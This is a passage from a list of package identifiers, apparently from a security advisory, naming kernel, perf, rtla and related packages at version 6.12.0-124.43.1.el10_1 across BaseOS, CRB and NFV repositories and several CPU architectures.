"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
